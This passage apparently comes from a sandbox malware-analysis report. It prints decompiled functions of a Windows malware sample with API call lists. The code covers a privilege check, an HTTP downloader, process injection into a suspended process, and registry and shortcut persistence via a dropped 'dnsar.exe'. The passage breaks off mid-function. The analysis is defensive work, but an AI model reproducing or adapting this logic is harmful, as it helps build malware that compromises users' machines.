    					_v16 = E007C13DC(0x400);
    					_v32 = GetTokenInformation(_v12, 2, _v16, 0x400,  &_v20);
    					CloseHandle(_v12);
    					if(_v32 != 0) {
    						AllocateAndInitializeSid(0x7ca2a4, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v24);
    						_t52 =  *_v16 - 1;
    						if(_t52 >= 0) {
    							_v36 = _t52 + 1;
    							_v28 = 0;
    							while(EqualSid(_v24,  *(_v16 + 4 + _v28 * 8)) == 0) {
    								_v28 = _v28 + 1;
    								_t28 =  &_v36;
    								 *_t28 = _v36 - 1;
    								if( *_t28 != 0) {
    									continue;
    								}
    								goto L11;
    							}
    							_v5 = 1;
    						}
    						L11:
    						FreeSid(_v24);
    					}
    					E007C1440(_v16);
    				}
    				return _v5;
    			}

    APIs
    • GetCurrentThread.KERNEL32 ref: 007C41DE
    • OpenThreadToken.ADVAPI32(00000000), ref: 007C41E5
    • GetLastError.KERNEL32 ref: 007C41F4
    • GetCurrentProcess.KERNEL32 ref: 007C4207
    • OpenProcessToken.ADVAPI32(00000000), ref: 007C420E
      • Part of subcall function 007C13DC: GetProcessHeap.KERNEL32(00000000,?), ref: 007C13EB
      • Part of subcall function 007C13DC: RtlAllocateHeap.NTDLL(00000000), ref: 007C13F2
    • GetTokenInformation.ADVAPI32(?,00000002,?,00000400,?), ref: 007C4241
    • CloseHandle.KERNEL32(?), ref: 007C424E
    • AllocateAndInitializeSid.ADVAPI32(007CA2A4,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 007C4278
    • EqualSid.ADVAPI32(?,?), ref: 007C42A2
    • FreeSid.ADVAPI32(?), ref: 007C42BE
      • Part of subcall function 007C1440: GetProcessHeap.KERNEL32(00000000,?), ref: 007C144D
      • Part of subcall function 007C1440: HeapFree.KERNEL32(00000000), ref: 007C1454
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    C-Code - Quality: 100%
    			E007C82F8(intOrPtr __eax, intOrPtr __ecx, intOrPtr __edx, void* __eflags) {
    				intOrPtr _v8;
    				intOrPtr _v12;
    				intOrPtr _v16;
    				intOrPtr _v20;
    				intOrPtr _v24;
    				intOrPtr _v28;
    				char _v541;
    				char _v1054;
    				struct _STARTUPINFOA _v1124;
    				struct _PROCESS_INFORMATION _v1140;
    				intOrPtr _t41;
    				intOrPtr _t57;
    				intOrPtr _t62;
    				intOrPtr _t66;
    				intOrPtr _t77;
    
    				_v16 = __ecx;
    				_v12 = __edx;
    				_v8 = __eax;
    				_v20 = 0;
    				_v24 = E007C7CFC(_v12);
    				E007C1258( &_v1124, 0x44);
    				_v1124.cb = 0x44;
    				if(_v24 == 0) {
    					_t41 =  *0x7ca168; // 0x7c1dec
    					E007C7290(_t41);
    				} else {
    					_v28 = E007C1110(_v8, 0x7c8494);
    					_t96 = _v28;
    					if(_v28 != 0) {
    						GetTempPathA(0x201,  &_v1054);
    						E007C7560( &_v1054, 0x7c8494, _t96);
    						E007C1308( &_v541, 0x7c849c);
    						E007C133C( &_v541,  &_v1054);
    						E007C133C( &_v541, 0x7c849c);
    						_t57 =  *0x7ca0a8; // 0x7c1c4c
    						E007C133C( &_v541, _t57);
    						if( *((char*)(_v28 + 4)) != 0x31) {
    							 *0x7cb514 = 0;
    							_t62 =  *0x7cb510; // 0x490000
    							E007C1828(_t62);
    							E007C13B4(0x7cb510, _v16);
    							_t66 =  *0x7cb510; // 0x490000
    							E007C12B8(_t66, _v16, _v12);
    							 *0x7cb514 = _v16;
    							 *0x7cbe1c = 0;
    							wsprintfA("1530474054", 0x7c84a0, _v24);
    						} else {
    							E007C485C( &_v1054, _v16, _v12);
    							Sleep(0x5dc);
    							if(CreateProcessA(0,  &_v541, 0, 0, 0, 0, 0, 0,  &_v1124,  &_v1140) == 0) {
    								_t77 =  *0x7ca174; // 0x7c1e10
    								E007C7290(_t77);
    							} else {
    								_v20 = 0xffffffff;
    							}
    						}
    					}
    				}
    				return _v20;
    			}

    APIs
    • GetTempPathA.KERNEL32(00000201,?), ref: 007C8364
    • Sleep.KERNEL32(000005DC), ref: 007C83E3
    • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 007C840C
      • Part of subcall function 007C1828: VirtualFree.KERNELBASE(?,00000000,00008000,?,?,007C6A2F), ref: 007C183A
      • Part of subcall function 007C13B4: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 007C13CD
    • wsprintfA.USER32 ref: 007C8476
      • Part of subcall function 007C485C: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 007C4886
      • Part of subcall function 007C485C: WriteFile.KERNEL32(000000FF,?,?,?,00000000), ref: 007C48A7
      • Part of subcall function 007C485C: FlushFileBuffers.KERNEL32(000000FF), ref: 007C48C4
      • Part of subcall function 007C485C: CloseHandle.KERNEL32(000000FF), ref: 007C48CE
      • Part of subcall function 007C7290: CreateThread.KERNEL32(00000000,00000000,Function_00007278,?,00000000,?), ref: 007C72AC
      • Part of subcall function 007C7290: CloseHandle.KERNEL32(?), ref: 007C72B9
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    C-Code - Quality: 75%
    			E007C9347() {
    				intOrPtr _t24;
    				intOrPtr _t32;
    				intOrPtr _t42;
    				intOrPtr* _t47;
    				intOrPtr* _t49;
    				void* _t51;
    
    				if( *_t49() != 0) {
    					 *_t47(0);
    				}
    				if(E007C453C(GetCurrentProcess()) == 0) {
    					GetWindowsDirectoryA(_t51 - 0x218, 0x101);
    					E007C133C(_t51 - 0x218, 0x7c946c);
    				} else {
    					GetWindowsDirectoryA(_t51 - 0x218, 0x101);
    					_t42 =  *0x7ca0b0; // 0x7c1c64
    					E007C133C(_t51 - 0x218, _t42);
    				}
    				_t24 =  *0x7ca08c; // 0x7c1c00
    				E007C133C(_t51 - 0x218, _t24);
    				 *((intOrPtr*)(_t51 - 0xc)) = E007C5028(_t51 - 0x218, 0, E007C9080, _t51 - 0x117, 0xffffffff, 0xfa0);
    				if( *((intOrPtr*)(_t51 - 0xc)) == 0xffffffff) {
    					 *0x7cb21c(0, _t51 - 0x218, 0x26, 0xffffffff);
    					_t32 =  *0x7ca0dc; // 0x7c1ce8
    					E007C133C(_t51 - 0x218, _t32);
    					if(PathFileExistsA(_t51 - 0x218) != 0) {
    						 *((intOrPtr*)(_t51 - 0xc)) = E007C5028(_t51 - 0x218, 0, E007C9080, _t51 - 0x117, 0xffffffff, 0xfa0);
    					}
    				}
    				ExitProcess(0);
    			}

    APIs
    • GetCurrentProcess.KERNEL32 ref: 007C9359
      • Part of subcall function 007C453C: GetCurrentProcess.KERNEL32 ref: 007C4555
      • Part of subcall function 007C453C: IsWow64Process.KERNELBASE(00000000,?), ref: 007C456F
    • GetWindowsDirectoryA.KERNEL32(?,00000101), ref: 007C9374
    • GetWindowsDirectoryA.KERNEL32(?,00000101), ref: 007C939D
      • Part of subcall function 007C5028: GetModuleHandleA.KERNEL32(00000000), ref: 007C5040
      • Part of subcall function 007C5028: CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 007C508F
      • Part of subcall function 007C5028: CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,?,?), ref: 007C50F5
      • Part of subcall function 007C5028: MapViewOfFile.KERNEL32(?,000F001F,00000000,00000000,00000000), ref: 007C510D
      • Part of subcall function 007C5028: GetThreadContext.KERNEL32(?,00010007), ref: 007C5209
      • Part of subcall function 007C5028: VirtualProtectEx.KERNEL32(?,00000000,0000029B,00000040,?), ref: 007C5252
      • Part of subcall function 007C5028: WriteProcessMemory.KERNEL32(?,00000000,?,0000029B,?), ref: 007C526C
      • Part of subcall function 007C5028: ResumeThread.KERNEL32(?), ref: 007C527E
      • Part of subcall function 007C5028: WaitForSingleObject.KERNEL32(?,00000000), ref: 007C5292
      • Part of subcall function 007C5028: GetExitCodeProcess.KERNEL32(?,?), ref: 007C52A4
      • Part of subcall function 007C5028: CloseHandle.KERNEL32(?), ref: 007C52BE
      • Part of subcall function 007C5028: CloseHandle.KERNEL32(?), ref: 007C52C8
    • SHGetSpecialFolderPathA.SHELL32(00000000,?,00000026,000000FF), ref: 007C9406
    • PathFileExistsA.SHLWAPI(?), ref: 007C9428
    • ExitProcess.KERNEL32 ref: 007C945B
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    C-Code - Quality: 100%
    			E007C7C4E(CHAR* __eax) {
    				CHAR* _v8;
    				intOrPtr _v12;
    				void* _v16;
    				long _v20;
    				intOrPtr _v24;
    				void _v84;
    				intOrPtr _v100;
    				void _v104;
    
    				_v8 = __eax;
    				_v12 = 0;
    				_v16 = CreateFileA(_v8, 0x80000000, 1, 0, 3, 0, 0);
    				if(_v16 == 0xffffffff) {
    					_v16 = CreateFileA(_v8, 0x80000000, 0, 0, 3, 0, 0);
    				}
    				if(_v16 != 0xffffffff) {
    					ReadFile(_v16,  &_v84, 0x40,  &_v20, 0);
    					SetFilePointer(_v16, _v24 + 4, 0, 0);
    					ReadFile(_v16,  &_v104, 0x14,  &_v20, 0);
    					CloseHandle(_v16);
    					_v12 = _v100;
    				}
    				return _v12;
    			}

    APIs
    • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007C7C71
    • CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 007C7C93
    • ReadFile.KERNEL32(000000FF,?,00000040,?,00000000), ref: 007C7CB2
    • SetFilePointer.KERNEL32(000000FF,?,00000000,00000000), ref: 007C7CC7
    • ReadFile.KERNEL32(000000FF,?,00000014,?,00000000), ref: 007C7CDD
    • CloseHandle.KERNEL32(000000FF), ref: 007C7CE7
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    C-Code - Quality: 100%
    			E007C7C50(CHAR* __eax) {
    				CHAR* _v8;
    				intOrPtr _v12;
    				void* _v16;
    				long _v20;
    				intOrPtr _v24;
    				void _v84;
    				intOrPtr _v100;
    				void _v104;
    
    				_v8 = __eax;
    				_v12 = 0;
    				_v16 = CreateFileA(_v8, 0x80000000, 1, 0, 3, 0, 0);
    				if(_v16 == 0xffffffff) {
    					_v16 = CreateFileA(_v8, 0x80000000, 0, 0, 3, 0, 0);
    				}
    				if(_v16 != 0xffffffff) {
    					ReadFile(_v16,  &_v84, 0x40,  &_v20, 0);
    					SetFilePointer(_v16, _v24 + 4, 0, 0);
    					ReadFile(_v16,  &_v104, 0x14,  &_v20, 0);
    					CloseHandle(_v16);
    					_v12 = _v100;
    				}
    				return _v12;
    			}

    APIs
    • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007C7C71
    • CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 007C7C93
    • ReadFile.KERNEL32(000000FF,?,00000040,?,00000000), ref: 007C7CB2
    • SetFilePointer.KERNEL32(000000FF,?,00000000,00000000), ref: 007C7CC7
    • ReadFile.KERNEL32(000000FF,?,00000014,?,00000000), ref: 007C7CDD
    • CloseHandle.KERNEL32(000000FF), ref: 007C7CE7
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    C-Code - Quality: 92%
    			E007C4A68(intOrPtr __eax) {
    				intOrPtr _v8;
    				signed int _v12;
    				long _v16;
    				signed int _v20;
    				void* _v24;
    				char _v153;
    				int _t30;
    				char* _t32;
    				intOrPtr _t37;
    				signed int _t52;
    				signed char _t62;
    				intOrPtr _t67;
    
    				_v8 = __eax;
    				_v12 = 0;
    				_v16 = 0x81;
    				_t30 = GetComputerNameA( &_v153,  &_v16);
    				_t72 = _t30;
    				if(_t30 != 0) {
    					_v12 = E007C1740( &_v153);
    				}
    				_t32 =  *0x7ca25c; // 0x7c2174
    				RegOpenKeyExA(0x80000002, _t32, 0, 0x20119,  &_v24);
    				_v16 = 4;
    				_v20 = 0;
    				_t37 =  *0x7ca0f0; // 0x7c1d3c
    				E007C38B0(_v24, _t37, 0, 0,  &_v20,  &_v16);
    				E007C3890(_v24);
    				_v12 = _v12 ^ _v20 ^ 0x4c8aa297;
    				E007C1164(_v12,  &_v153);
    				 *0x7ca064 = E007C44F0(_t72);
    				 *0x7ca068 = E007C42D4(GetCurrentProcess());
    				if(E007C44F0(_t72) >= 0x3c) {
    					_t52 = E007C42D4(GetCurrentProcess());
    					__eflags = _t52 - 3;
    					_t21 = _t52 == 3;
    					__eflags = _t21;
    					asm("sbb eax, eax");
    					 *0x7ca034 =  ~(_t52 & 0xffffff00 | _t21);
    				} else {
    					_t62 = E007C41CC();
    					asm("sbb eax, eax");
    					 *0x7ca034 =  ~_t62;
    				}
    				if( *0x7ca034 != 0) {
    					_t67 =  *0x7ca09c; // 0x7c1c30
    					E007C1308(_v8, _t67);
    				}
    				E007C133C(_v8, 0x7c4b9c);
    				return E007C133C(_v8,  &_v153);
    			}

    APIs
    • GetComputerNameA.KERNEL32(?,00000081), ref: 007C4A8B
    • RegOpenKeyExA.ADVAPI32(80000002,007C2174,00000000,00020119,?), ref: 007C4AB9
      • Part of subcall function 007C38B0: RegQueryValueExA.KERNELBASE(?,?,?,?,?,?,?,?,007C6992,?,007C1D3C,00000000,00000000,?,?), ref: 007C38CC
      • Part of subcall function 007C3890: RegCloseKey.ADVAPI32(?), ref: 007C389D
      • Part of subcall function 007C44F0: GetVersionExA.KERNEL32(0000009C), ref: 007C451A
    • GetCurrentProcess.KERNEL32 ref: 007C4B17
      • Part of subcall function 007C42D4: OpenProcessToken.ADVAPI32(?,00000008,?), ref: 007C42EC
      • Part of subcall function 007C42D4: GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 007C430E
      • Part of subcall function 007C42D4: GetLastError.KERNEL32 ref: 007C4322
      • Part of subcall function 007C42D4: GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,?,?), ref: 007C4358
      • Part of subcall function 007C42D4: GetSidSubAuthorityCount.ADVAPI32(?), ref: 007C436E
      • Part of subcall function 007C42D4: GetSidSubAuthority.ADVAPI32(?,?), ref: 007C4393
      • Part of subcall function 007C42D4: CloseHandle.KERNEL32(?), ref: 007C43F3
    • GetCurrentProcess.KERNEL32 ref: 007C4B41
      • Part of subcall function 007C41CC: GetCurrentThread.KERNEL32 ref: 007C41DE
      • Part of subcall function 007C41CC: OpenThreadToken.ADVAPI32(00000000), ref: 007C41E5
      • Part of subcall function 007C41CC: GetLastError.KERNEL32 ref: 007C41F4
      • Part of subcall function 007C41CC: GetCurrentProcess.KERNEL32 ref: 007C4207
      • Part of subcall function 007C41CC: OpenProcessToken.ADVAPI32(00000000), ref: 007C420E
      • Part of subcall function 007C41CC: GetTokenInformation.ADVAPI32(?,00000002,?,00000400,?), ref: 007C4241
      • Part of subcall function 007C41CC: CloseHandle.KERNEL32(?), ref: 007C424E
      • Part of subcall function 007C41CC: AllocateAndInitializeSid.ADVAPI32(007CA2A4,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 007C4278
      • Part of subcall function 007C41CC: EqualSid.ADVAPI32(?,?), ref: 007C42A2
      • Part of subcall function 007C41CC: FreeSid.ADVAPI32(?), ref: 007C42BE
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    C-Code - Quality: 100%
    			E007C82F4(intOrPtr* __eax, intOrPtr __ecx, intOrPtr __edx) {
    				intOrPtr _v8;
    				intOrPtr _v12;
    				intOrPtr _v16;
    				intOrPtr _v20;
    				intOrPtr _v24;
    				intOrPtr _v28;
    				char _v541;
    				char _v1054;
    				struct _STARTUPINFOA _v1124;
    				struct _PROCESS_INFORMATION _v1140;
    				intOrPtr* _t36;
    				intOrPtr _t42;
    				intOrPtr _t58;
    				intOrPtr _t63;
    				intOrPtr _t67;
    				intOrPtr _t78;
    
    				_t36 = __eax -  *__eax;
    				 *_t36 =  *_t36 + _t36;
    				_v16 = __ecx;
    				_v12 = __edx;
    				_v8 = _t36;
    				_v20 = 0;
    				_v24 = E007C7CFC(_v12);
    				E007C1258( &_v1124, 0x44);
    				_v1124.cb = 0x44;
    				if(_v24 == 0) {
    					_t42 =  *0x7ca168; // 0x7c1dec
    					E007C7290(_t42);
    				} else {
    					_v28 = E007C1110(_v8, 0x7c8494);
    					_t102 = _v28;
    					if(_v28 != 0) {
    						GetTempPathA(0x201,  &_v1054);
    						E007C7560( &_v1054, 0x7c8494, _t102);
    						E007C1308( &_v541, 0x7c849c);
    						E007C133C( &_v541,  &_v1054);
    						E007C133C( &_v541, 0x7c849c);
    						_t58 =  *0x7ca0a8; // 0x7c1c4c
    						E007C133C( &_v541, _t58);
    						if( *((char*)(_v28 + 4)) != 0x31) {
    							 *0x7cb514 = 0;
    							_t63 =  *0x7cb510; // 0x490000
    							E007C1828(_t63);
    							E007C13B4(0x7cb510, _v16);
    							_t67 =  *0x7cb510; // 0x490000
    							E007C12B8(_t67, _v16, _v12);
    							 *0x7cb514 = _v16;
    							 *0x7cbe1c = 0;
    							wsprintfA("1530474054", 0x7c84a0, _v24);
    						} else {
    							E007C485C( &_v1054, _v16, _v12);
    							Sleep(0x5dc);
    							if(CreateProcessA(0,  &_v541, 0, 0, 0, 0, 0, 0,  &_v1124,  &_v1140) == 0) {
    								_t78 =  *0x7ca174; // 0x7c1e10
    								E007C7290(_t78);
    							} else {
    								_v20 = 0xffffffff;
    							}
    						}
    					}
    				}
    				return _v20;
    			}

    APIs
      • Part of subcall function 007C7290: CreateThread.KERNEL32(00000000,00000000,Function_00007278,?,00000000,?), ref: 007C72AC
      • Part of subcall function 007C7290: CloseHandle.KERNEL32(?), ref: 007C72B9
      • Part of subcall function 007C1828: VirtualFree.KERNELBASE(?,00000000,00008000,?,?,007C6A2F), ref: 007C183A
      • Part of subcall function 007C13B4: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 007C13CD
    • GetTempPathA.KERNEL32(00000201,?), ref: 007C8364
    • wsprintfA.USER32 ref: 007C8476
      • Part of subcall function 007C485C: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 007C4886
      • Part of subcall function 007C485C: WriteFile.KERNEL32(000000FF,?,?,?,00000000), ref: 007C48A7
      • Part of subcall function 007C485C: FlushFileBuffers.KERNEL32(000000FF), ref: 007C48C4
      • Part of subcall function 007C485C: CloseHandle.KERNEL32(000000FF), ref: 007C48CE
    • Sleep.KERNEL32(000005DC), ref: 007C83E3
    • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 007C840C
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    C-Code - Quality: 78%
    			E007C9230(intOrPtr* __ebx, intOrPtr* __ecx) {
    				void* _t11;
    				int _t12;
    				CHAR* _t14;
    				void* _t22;
    				intOrPtr _t24;
    				void* _t25;
    
    				if( *__ecx() != 0) {
    					_push(0);
    					 *__ebx();
    				}
    				_pop(_t22);
    				_pop(_t19);
    				_t24 =  *0x7ca0a8; // 0x7c1c4c
    				_t11 = E007C1110( *((intOrPtr*)(_t25 - 4)), _t24);
    				_t29 = _t11;
    				if(_t11 == 0) {
    					 *((char*)(_t25 - 0x116)) = 0x2d;
    				} else {
    					 *((char*)(_t25 - 0x116)) = 0x2b;
    					Sleep(0x3a98);
    				}
    				_t12 = E007C6E04(_t22, _t29);
    				if(_t12 == 0) {
    					if( *((char*)(_t25 - 0x116)) != 0x2d) {
    						L9:
    						_push(_t12);
    						_push(_t22);
    						_t12 = E007C69BC(_t24, _t32) + E007C92CD;
    						goto __eax;
    					}
    					_t14 =  *0x7ca0d8; // 0x7c1cc8
    					_t12 = OpenMutexA(0x100000, 0, _t14);
    					 *(_t25 - 8) = _t12;
    					_t32 =  *(_t25 - 8);
    					if( *(_t25 - 8) == 0) {
    						goto L9;
    					}
    					_t12 = CloseHandle( *(_t25 - 8));
    					ExitProcess(0);
    				}
    				return _t12;
    			}

    APIs
    • Sleep.KERNEL32(00003A98), ref: 007C9260
      • Part of subcall function 007C6E04: GetModuleFileNameA.KERNEL32(00000000,?,000001F5), ref: 007C6E26
      • Part of subcall function 007C6E04: CharUpperBuffA.USER32(?,000001F5), ref: 007C6E37
    • OpenMutexA.KERNEL32(00100000,00000000,007C1CC8), ref: 007C9292
    • CloseHandle.KERNEL32(00000000), ref: 007C92A5
    • ExitProcess.KERNEL32 ref: 007C92AD
      • Part of subcall function 007C69BC: GetTempPathA.KERNEL32(00000101,?), ref: 007C69E1
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    C-Code - Quality: 98%
    			E007C3C28(intOrPtr __eax, void* __ecx, CHAR* __edx) {
    				intOrPtr _v8;
    				CHAR* _v12;
    				char _v16;
    				intOrPtr _v20;
    				intOrPtr _v24;
    				intOrPtr _v28;
    				long _v32;
    				char _v36;
    				char _v40;
    				intOrPtr _v44;
    				long _v48;
    				void* _v52;
    				intOrPtr _v56;
    				intOrPtr _v60;
    				intOrPtr _v64;
    				signed char _v68;
    				signed int _v72;
    				char _v201;
    				char _v458;
    				void _v1483;
    				signed int _t88;
    				intOrPtr _t93;
    				void* _t94;
    				intOrPtr _t162;
    				intOrPtr _t165;
    				void* _t175;
    				void* _t180;
    
    				_v12 = __edx;
    				_v8 = __eax;
    				_v16 = 0;
    				_t176 =  *0x7cb7a4;
    				if( *0x7cb7a4 == 0) {
    					E007C3A04(_t176);
    				}
    				_t162 =  *0x7ca1a4; // 0x7c1ec0
    				_t88 = E007C1110(_v8, _t162);
    				asm("sbb eax, eax");
    				_v68 =  ~(_t88 & 0xffffff00 | _t88 == _v8);
    				_v56 = E007C1110(_v8, E007C3E98);
    				if(_v56 != 0) {
    					_v56 = _v56 + 2;
    					_v60 = E007C1110(_v56, 0x7c3e9c);
    					_v32 = _v60 - _v56;
    					E007C12B8( &_v201, _v32, _v56);
    					 *((char*)(_t175 + _v32 - 0xc5)) = 0;
    					E007C1308( &_v458, _v60);
    				}
    				_t93 =  *0x7ca298; // 0x0
    				_t94 = _t93 - 1;
    				_t180 = _t94;
    				if(_t180 < 0) {
    					_v64 = 0;
    				} else {
    					if(_t180 == 0) {
    						_v64 = 0;
    					} else {
    						if(_t94 == 1) {
    							_v64 = 1;
    						}
    					}
    				}
    				_v20 = E007C3864(0x7cb7a4, _v64, 0, 0, 0);
    				if(_v68 == 0) {
    					_v72 = 0x50;
    				} else {
    					_v72 = 0x1bb;
    				}
    				_v24 = E007C161C(_v20, _v72,  &_v201, 0, 0, 3, 0, 0);
    				if(_v68 == 0) {
    					_v72 = 0x4400000;
    				} else {
    					_v72 = 0x4c03000;
    				}
    				_t165 =  *0x7ca244; // 0x7c20b8
    				_v28 = E007C1660(_v24,  &_v458, _t165, 0, _v72, 0, 0, 0);
    				if(_v68 != 0) {
    					_v32 = 4;
    					E007C16D8(_v28,  &_v72, 0x1f,  &_v32);
    					_v72 = _v72 | 0x00000100;
    					E007C170C(_v28,  &_v72, 0x1f, 4);
    				}
    				E007C15E4(_v28, 0, 0, 0, 0);
    				_v32 = 4;
    				_v36 = 0;
    				_v40 = 0;
    				E007C39CC(_v28,  &_v36, 0x20000013,  &_v40,  &_v32);
    				if(_v36 != 0xc8) {
    					L24:
    					E007C151C(_v28);
    					E007C151C(_v24);
    					E007C151C(_v20);
    					return _v16;
    				} else {
    					_v52 = CreateFileA(_v12, 0x40000000, 0, 0, 2, 0x80, 0);
    					if(_v52 == 0xffffffff) {
    						goto L24;
    					} else {
    						goto L21;
    					}
    					do {
    						L21:
    						_v44 = E007C16A4(_v28, 0,  &_v32, 0);
    						E007C15B0(_v28, 0x401,  &_v1483,  &_v32);
    						WriteFile(_v52,  &_v1483, _v32,  &_v48, 0);
    					} while (_v32 != 0 || _v44 == 0);
    					CloseHandle(_v52);
    					_v16 = 0xffffffff;
    					goto L24;
    				}
    			}

    APIs
      • Part of subcall function 007C3864: InternetOpenA.WININET(?,?,?,?,?), ref: 007C387C
      • Part of subcall function 007C161C: InternetConnectA.WININET(?,?,?,?,?,?,?,?), ref: 007C164D
      • Part of subcall function 007C1660: HttpOpenRequestA.WININET(?,?,?,?,?,?,?,?), ref: 007C168F
      • Part of subcall function 007C15E4: HttpSendRequestA.WININET(?,?,?,?,?), ref: 007C1607
      • Part of subcall function 007C39CC: HttpQueryInfoA.WININET(?,?,?,?,?), ref: 007C39EF
    • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 007C3E08
      • Part of subcall function 007C16A4: InternetQueryDataAvailable.WININET(?,?,?,?), ref: 007C16C3
      • Part of subcall function 007C15B0: InternetReadFile.WININET(?,?,?,?), ref: 007C15CF
    • WriteFile.KERNEL32(000000FF,?,00000004,?,00000000), ref: 007C3E55
    • CloseHandle.KERNEL32(000000FF), ref: 007C3E6B
      • Part of subcall function 007C151C: InternetCloseHandle.WININET(?), ref: 007C1529
      • Part of subcall function 007C16D8: InternetQueryOptionA.WININET(?,?,?,?), ref: 007C16F7
      • Part of subcall function 007C170C: InternetSetOptionA.WININET(?,?,?,?), ref: 007C172B
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    C-Code - Quality: 93%
    			E007C76A0(int __eax, void* __ebx) {
    				int _v8;
    				char* _v12;
    				char* _v16;
    				char _v273;
    				char _v530;
    				void* __ebp;
    				int _t38;
    				signed int _t46;
    				signed int _t50;
    				signed int _t57;
    				intOrPtr _t92;
    				intOrPtr _t97;
    				intOrPtr _t99;
    				intOrPtr _t100;
    				intOrPtr _t102;
    				intOrPtr _t104;
    				intOrPtr _t108;
    				intOrPtr _t109;
    				void* _t111;
    				void* _t112;
    				void* _t113;
    
    				_t38 = __eax;
    				_v8 = __eax;
    				if( *0x7cb514 > 0 &&  *0x7cb510 != 0) {
    					E007C1308( &_v530, 0x7cb518);
    					 *((char*)(_t111 + E007C12DC(0x7cb518) - 0x212)) = 0;
    					E007C133C( &_v530, ".lnk");
    					_t113 = _t112 + 8;
    					_t96 =  &_v530;
    					_t102 =  *0x7ca0ac; // 0x7c1c58
    					_t46 = E007C3FC8(0x7cb518, __ebx,  &_v530, _t102);
    					asm("sbb eax, eax");
    					if( ~( ~_t46) == 0) {
    						E007C1308( &_v530, 0x7c78ec);
    						E007C133C( &_v530, "C:\Program Files\Windows NT\dnsar.exe");
    						E007C133C( &_v530, 0x7c78f0);
    						_t92 =  *0x7ca0ac; // 0x7c1c58
    						E007C133C( &_v530, _t92);
    						_t113 = _t113 + 0x18;
    					}
    					if( *0x7ca034 == 0) {
    						_t50 = E007C4968(0x80000001, _t96,  &_v530);
    						asm("sbb eax, eax");
    						_t38 =  ~( ~_t50);
    						if(_t38 != 0 &&  *0x7cb514 > 0 &&  *0x7cb510 != 0) {
    							_t97 =  *0x7cb514; // 0x28800
    							_t104 =  *0x7cb510; // 0x490000
    							E007C485C(0x7cb518, _t97, _t104);
    							return E007C763C(0x7cb518);
    						}
    					} else {
    						_t57 = E007C4968(0x80000002, _t96,  &_v530);
    						asm("sbb eax, eax");
    						_t38 =  ~( ~_t57);
    						if(_t38 != 0) {
    							if(_v8 != 0) {
    								_t100 =  *0x7cb514; // 0x28800
    								_t109 =  *0x7cb510; // 0x490000
    								E007C485C(0x7cb518, _t100, _t109);
    								return E007C763C(0x7cb518);
    							}
    							E007C1308( &_v273, 0x7cb518);
    							_v12 =  &_v273;
    							_v16 = 0;
    							while( *_v12 != 0) {
    								if( *_v12 == 0x5c) {
    									_v16 = _v12;
    								}
    								_v12 = _v12 + 1;
    							}
    							if(_v16 == 0) {
    								_v16 =  &_v273;
    							} else {
    								_v16 = _v16 + 1;
    							}
    							 *_v16 = 0;
    							_v12 = E007C3B80(9, 0x19, 0x14);
    							E007C133C(_v16, _v12);
    							E007C1440(_v12);
    							E007C133C(_v16, ".txt");
    							_t38 = MoveFileExA( &_v273, "C:\Program Files\Windows NT\dnsar.exe", 4);
    							if( *0x7cb514 > 0 &&  *0x7cb510 != 0) {
    								_t99 =  *0x7cb514; // 0x28800
    								_t108 =  *0x7cb510; // 0x490000
    								E007C485C( &_v273, _t99, _t108);
